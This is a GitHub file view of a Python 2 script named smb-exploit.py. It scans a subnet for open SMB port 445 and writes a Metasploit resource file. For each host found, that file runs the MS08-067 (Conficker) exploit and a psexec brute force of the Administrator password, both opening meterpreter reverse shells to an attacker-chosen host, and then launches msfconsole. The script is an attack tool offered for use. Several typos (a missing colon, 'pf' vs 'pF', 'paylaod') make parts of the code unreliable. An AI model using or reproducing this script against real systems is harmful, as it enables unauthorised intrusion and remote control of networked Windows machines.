-
Notifications
You must be signed in to change notification settings - Fork 2
Expand file tree
/
Copy pathsmb-exploit.py
More file actions
75 lines (73 loc) · 2.77 KB
/
smb-exploit.py
File metadata and controls
75 lines (73 loc) · 2.77 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
'''using two attack vector'''
import os
import optparse
import sys
import nmap
def findTrgs(subNet):
nmScan=nmap.PortScanner()
nmScan.scan(subNet,'445') #445 is used by smb
trgHosts=[]
for host in nmScan.all_hosts():
if nmScan[host].has_tcp(445):
state=nmScan[host]['tcp'][445]['state']
if state=='open'
print '[+] Found target host: '+ host
trgHosts.append(host)
return trgHosts
def setupHandler(configFile,lhost,lport):
configFile.write('use exploit/multi/handler\n')
configFile.write('set payload windows/meterpreter/reverse_tcp\n')
configFile.write('set LPORT '+str(lport)+'\n')
configFile.write('set LHOST '+ str(lhost)+'\n')
configFile.write('exploit -j -z\n')
configFile.write('set DisablePayloadHandler 1\n')
def confikerExplopit(configFile,trgHost,lhost,lport):
configFile.write('use exploit/windows/smb/ms08_067_netapi\n')
configFile.write('set RHOST '+ str(trgHost) +'\n')
configFile.write('set paylaod windows/meterpreter/reverse_tcp\n')
configFile.write('set LPORT '+ str(lport)+'\n')
configFile.write('set LHOST '+ str(lhost)+'\n')
configFile.write('exploit -j -z\n')
def smbBrute(configFile,trgHost,passwdFile,lhost,lport):
username='Administrator'
pF=open(passwdFile,'r')
for password in pf.readlines():
password=password.strip('\n').strip('\r')
configFile.write('use exploit/windows/smb/psexec\n')
configFile.write('set SMBUser '+str(username)+'\n')
configFile.write('set SMBPass '+str(password)+'\n')
configFile.write('set RHOST '+str(trgHost)+'\n')
configFile.write('set payload windows/meterpreter/reverse_tcp\n')
configFile.write('set LPORT '+ str(lport)+'\n')
configFile.write('set LHOST '+ str(lhost)+'\n')
configFile.write('exploit -j -z\n')
def main():
configFile=open('meta.rc','w')
parser=optparse.OptionParser('[-] Usage%prog -H <RHOST[s]> -l <LHOST> [-p <LPORT> -F <password File>]')
parser.add_option('-H',dest='trgHost',type='string',\
help='Specify the target address[es]')
parser.add_option('-p',dest='lport',type='string',\
help='specify the listening port')
parser.add_option('-l',dest='lhost',type="string",\
help='Specify the listening host')
parser.add_option('-F',dest='passwdFile',type='string',\
help='Specify the password file for smb brute force attempt')
(options,args)=parser.parse_args()
if(options.trgHost==None or options.lhost==None):
print parser.usage
exit(0)
lhost=options.lhost
lport=options.lport
if lport==None:
lport='1337'
passwdFile=options.passwdFile
trgHosts=findTrgs(options.trgHost) #eg 192.168.1.30-80
setupHandler(configFile,lhost,lport)
for trgHost in trgHosts:
confikerExplopit(configFile,trgHost,lhost,lport)
if passwdFile != None:
smbBrute(configFile,trgHost,passwdFile,lhost,lport)
configFile.close()
os.system('msfconsole -r meta.rc')
if __name__ == '__main__':
main()